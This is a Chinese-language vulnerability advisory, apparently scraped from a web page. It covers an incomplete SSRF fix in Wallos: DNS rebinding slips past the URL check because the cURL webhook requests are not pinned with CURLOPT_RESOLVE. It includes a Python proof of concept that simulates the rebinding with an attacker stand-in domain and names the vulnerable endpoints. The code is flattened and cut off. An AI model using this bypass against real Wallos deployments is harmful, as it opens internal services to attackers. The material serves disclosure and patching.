Wallos SSRF漏洞(CVE-2026-3399)修复不完整及DNS重绑定分析

漏洞总结：CVE-2026-3399 (SSRF) 漏洞概述 漏洞名称：Incomplete fix for CVE-2026-3399: SSRF in Wallos 漏洞类型：服务器端请求伪造 (SSRF) 严重程度：中等 (Medium) CWE：CWE-918 核心问题： Wallos 软件对 webhook URL 的修复是不完整的。虽然代码通过 验证了 URL 的 IP 地址，但在实际发起 HTTP 请求时，仍然使用了原始的 hostname 而非验证后的 IP。这导致了经典的 DNS Rebinding (DNS 重绑定) 攻击窗口（TOCTOU），攻击者可以在验证和请求之间通过 DNS 解析将域名指向内部 IP。 影响范围 受影响软件：Wallos 受影响版本： 修复版本： 受影响端点： 1. 2. 3. (支持 discord, gotify, ntfy, webhook) 4. (支持 discord, gotify, ntfy, webhook) 修复方案 1. 强制 IP 解析：在发起 cURL 请求时，必须使用 选项，强制将 hostname 解析为之前验证过的 IP 地址，而不是让 cURL 重新进行 DNS 解析。 2. 修复 IPv6 限制：原有的 函数仅处理 IPv4，导致 IPv6 映射的 CGNAT 地址（如 ）未被正确拦截，需修复此逻辑。 --- POC 代码提取 1. PHP 验证逻辑复现 (用于演示 TOCTOU 窗口) 2. Python 复现与 DNS 重绑定模拟 (包含完整利用逻辑) ```python #!/usr/bin/env python3 """ CVE-2026-3399 - Wallos Incomplete SSRF Fix (DNS Rebinding TOCTOU & Missing CURLLOPT_RESOLVE) Tested against: elite/Wallos commit 0961376 (pre-fix) and e87387f (post-fix) Extracted from: includes/ssrf_helper.php, endpoints/cronjobs/sendnotifications.php, endpoints/ai/fetch_models.php, endpoints/ai/save_settings.php Description: The patch in commit e87387f adds SSRF validation via validate_webhook_url_for_ssrf() and is_url_safe_for_ssrf(). However, the fix is incomplete in several ways: 1. DNS Rebinding TOCTOU: The non-fatal is_url_safe_for_ssrf() (used in cron notification endpoints) resolves DNS and checks the IP, but the subsequent curl_exec() calls use the original URL WITHOUT CURLLOPT_RESOLVE pinning. An attacker can use a DNS rebinding domain that first resolves to a public IP (passing the check) and then resolves to 127.0.0.1 (when curl actually connects). 2. Missing CURLLOPT_RESOLVE on most endpoints: Only generate_recommendations.php pins DNS via CURLLOPT_RESOLVE. The following endpoints do NOT pin: - endpoints/ai/fetch_models.php - endpoints/ai/save_settings.php - endpoints/cronjobs/sendnotifications.php (discord, gotify, ntfy, webhook) - endpoints/cronjobs/sendcancellationnotifications.php (discord, gotify, ntfy, webhook) 3. is_cgnat_ip() only handles IPv4 via ip2long(). IPv6-mapped CGNAT addresses (e.g., ::ffff:198.64.0.1) would not be caught by this check. """ import socket import threading import http.server import sys import time import re import os ----------------------------------------------------------------------------- Simulate PHP's ssrf_helper.php functions in Python ----------------------------------------------------------------------------- def ip2long(ip): """Simulate PHP ip2long() - only works with IPv4.""" parts = ip.split('.') if len(parts) != 4: return False try: return (int(parts[0]) return public IP return self.public_ip else: Subsequent calls: actual connection -> return private IP return self.private_ip def simulate_dns_rebinding_toctou(): """ Demonstrates the DNS rebinding TOCTOU bypass in the FIXED code. The fix resolves DNS once in is_url_safe_for_ssrf() but does not pin the result with CURLLOPT_RESOLVE in cron notification endpoints. """ print("=" 70) print("TEST 1: DNS Rebinding TOCTOU Bypass (Missing CURLLOPT_RESOLVE)") print("=" 70) rebinder = DNSRebindingSimulator() attacker_url = "http://rebind.attacker.example.com/webhook" --- Step 1: SSRF Check (first DNS resolution -> public IP) --- first_ip = rebinder.resolve("rebind.attacker.example.com") print(f"[] SSRF Check DNS resolution #1: {first_ip}") print(f"[] SSRF Check IP is private? {is_private_ip(first_ip)}") print(f"[] SSRF Check Result: PASS (public IP)") --- Step 2: Actual cURL request (second DNS resolution -> private IP) --- second_ip = rebinder.resolve("rebind.attacker.example.com") print(f"[] cURL Request DNS resolution #2: {second_ip}") print(f"[] cURL Request IP is private? {is_private_ip(second_ip)}") print(f"[] cURL Request Connection goes to: {second_ip} (INTERNAL)") Verify the bypass bypass = (not is_private_ip(first_ip)) and is_private_ip(second_ip) if bypass: print(f"[] BYPASS SUCCESSFUL: SSRF check saw {first_ip} (public)") print(f"[] but actual request went to {second_ip} (private/internal)") print(f"[] This is because the cron endpoints do NOT use CURLLOPT_RESOLVE") else: print(f"[] Bypass failed") return bypass def simulate_missing_curl_resolve(): """ Shows which endpoints use CURLLOPT_RESOLVE (safe) vs which don't (vulnerable). """ print("\n" + "=" 70) print("TEST 2: CURLLOPT_RESOLVE Coverage Analysis") print("=" 70) endpoints = { 'endpoints/ai/generate_recommendations.php (ollama)': True, FIXED 'endpoints/ai/fetch_models.php (ollama)': False, VULNERABLE 'endpoints/ai/save_settings.php (ollama)': False, VULNERABLE (validates but doesn't pin) 'endpoints/cronjobs/sendnotifications.php (discord)': False, VULNERABLE 'endpoints/cronjobs/sendnotifications.php (gotify)': False, VULNERABLE 'endpoints/cronjobs/sendnotifications.php (ntfy)': False, VULNERABLE 'endpoints/cronjobs/sendnotifications.php (webhook)': False, VULNERABLE 'endpoints/cronjobs/sendcancellationnotifications.php (discord)': False, VULNERABLE 'endpoints/cronjobs/sendcancellation

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Wallos SSRF漏洞(CVE-2026-3399)修复不完整及DNS重绑定分析

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Wallos SSRF漏洞(CVE-2026-3399)修复不完整及DNS重绑定分析

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！